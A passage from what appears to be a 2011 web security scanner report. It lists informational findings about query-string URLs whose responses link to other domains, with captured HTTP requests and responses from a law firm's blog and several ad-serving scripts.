Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:10:48 GMT
Vary: Accept-Encoding
Content-Length: 1728
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];ord=1315321849?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];ord=1315321849?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=177065&bid=1045312&lid=4749" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110906111049&cmxid=2101.020017706501045312xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

19.32. http://blog.harbottle.com/dm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/

Issue detail

The page was loaded from a URL containing a query string:

http://blog.harbottle.com/dm/?p=20

The response contains the following links to other domains:

http://dev.d10e.net/neptune/
http://elliottback.com/
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check/referer
http://wordpress.org/
http://www.192.com/
http://www.broadcastnow.co.uk/opinion_and_blogs/index.html
http://www.ft.com/comment/blogs/
http://www.google-analytics.com/urchin.js
http://www.guardian.co.uk/media/digitalmedia

Request

GET /dm/?p=20 HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/index.php?s=ip+phone+internet
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16588

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law » Is an Age Verification Law on the Cards?</title
...[SNIP]...
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blog.harbottle.com/dm/xmlrpc.php?rsd">
<link rel="powered" title="Elliott Back's Antispam" href="http://elliottback.com"><script type="text/javascript" src="http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php">
...[SNIP]...
<p>There are several references in the speeches of their Lordships to a service run by <a href="http://www.192.com/">www.192.com</a>
...[SNIP]...
<li><a href="http://www.broadcastnow.co.uk/opinion_and_blogs/index.html">Broadcast Magazine Blog</a>
...[SNIP]...
<li><a href="http://www.ft.com/comment/blogs/">FT.com Blog Pages</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/media/digitalmedia">The Guardian - Digital Media</a>
...[SNIP]...
<p>© 2011 Harbottle & Lewis LLP Powered by <a href="http://wordpress.org/">WordPress</a>
...[SNIP]...
</a>.
   Valid: <a href="http://validator.w3.org/check/referer" title="Validate the markup">HTML</a>,
   <a href="http://jigsaw.w3.org/css-validator/check/referer" title="Validate the stylesheet">CSS</a>.
   Modified <a href="http://dev.d10e.net/neptune/" title="Neptune WP theme development site">Neptune theme</a>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.33. http://blog.harbottle.com/dm/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://blog.harbottle.com/dm/index.php?s=xss

The response contains the following links to other domains:

http://dev.d10e.net/neptune/
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check/referer
http://wordpress.org/
http://www.broadcastnow.co.uk/opinion_and_blogs/index.html
http://www.ft.com/comment/blogs/
http://www.google-analytics.com/urchin.js
http://www.guardian.co.uk/media/digitalmedia

Request

GET /dm/index.php?s=xss HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?cat=11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9683

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<li><a href="http://www.broadcastnow.co.uk/opinion_and_blogs/index.html">Broadcast Magazine Blog</a>
...[SNIP]...
<li><a href="http://www.ft.com/comment/blogs/">FT.com Blog Pages</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/media/digitalmedia">The Guardian - Digital Media</a>
...[SNIP]...
<p>© 2011 Harbottle & Lewis LLP Powered by <a href="http://wordpress.org/">WordPress</a>
...[SNIP]...
</a>.
   Valid: <a href="http://validator.w3.org/check/referer" title="Validate the markup">HTML</a>,
   <a href="http://jigsaw.w3.org/css-validator/check/referer" title="Validate the stylesheet">CSS</a>.
   Modified <a href="http://dev.d10e.net/neptune/" title="Neptune WP theme development site">Neptune theme</a>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.34. http://clickserve.dartsearch.net/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.dartsearch.net
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.dartsearch.net/link/click?lid=43700003033082322&ds_s_kwgid=58700000011300929&ds_e_adid=8129792445&ds_e_matchtype=search&ds_url_v=2&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q

The response contains the following link to another domain:

http://ad.doubleclick.net/clk;243728195;67400646;n;u=ds&sv1=3033082322&sv2=2011090690&sv3=2913415;%3fhttp://www.bigcommerce.com/lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q

Request

GET /link/click?lid=43700003033082322&ds_s_kwgid=58700000011300929&ds_e_adid=8129792445&ds_e_matchtype=search&ds_url_v=2&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q HTTP/1.1
Host: clickserve.dartsearch.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://ad.doubleclick.net/clk;243728195;67400646;n;u=ds&sv1=3033082322&sv2=2011090690&sv3=2913415;%3fhttp://www.bigcommerce.com/lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:32:11 GMT
Expires: Tue, 06 Sep 2011 15:32:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 480
Server: GSE

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://ad.doubleclick.net/clk;243728195;67400646;n;u=ds&sv1=3033082322&sv2=2011090690&sv3=2913415;%3fhttp://www.bigcommerce.com/lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q">here</A>
...[SNIP]...

19.35. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "2202213-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=390
Expires: Tue, 06 Sep 2011 16:08:47 GMT
Date: Tue, 06 Sep 2011 16:02:17 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg="></iframe>
...[SNIP]...

19.36. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=755
Expires: Tue, 06 Sep 2011 15:38:50 GMT
Date: Tue, 06 Sep 2011 15:26:15 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg="></iframe>
...[SNIP]...

19.37. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=676
Expires: Tue, 06 Sep 2011 15:52:56 GMT
Date: Tue, 06 Sep 2011 15:41:40 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg="></iframe>
...[SNIP]...

19.38. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=100
Expires: Tue, 06 Sep 2011 16:09:06 GMT
Date: Tue, 06 Sep 2011 16:07:26 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg="></iframe>
...[SNIP]...

19.39. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382

The response contains the following link to another domain:

